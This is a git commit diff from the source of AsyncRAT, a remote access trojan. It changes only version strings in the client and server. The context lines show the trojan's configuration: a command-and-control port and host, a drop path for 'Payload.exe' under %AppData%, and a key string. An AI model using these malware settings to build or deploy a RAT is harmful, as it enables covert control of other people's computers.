Change version

This commit is contained in:
NYAN CAT 2019-06-17 17:30:03 +03:00
parent 1ca5eae0fb
commit dafd2d469d
2 changed files with 2 additions and 2 deletions

View File

@ -12,7 +12,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "0.4.9G";
public static string Version = "0.4.9H";
public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Key = "NYAN CAT";

View File

@ -16,7 +16,7 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.4.9G";
public static readonly string Version = "AsyncRAT 0.4.9H";
public static object Listview1Lock = new object();
public static object Listview2Lock = new object();
public static object Listview3Lock = new object();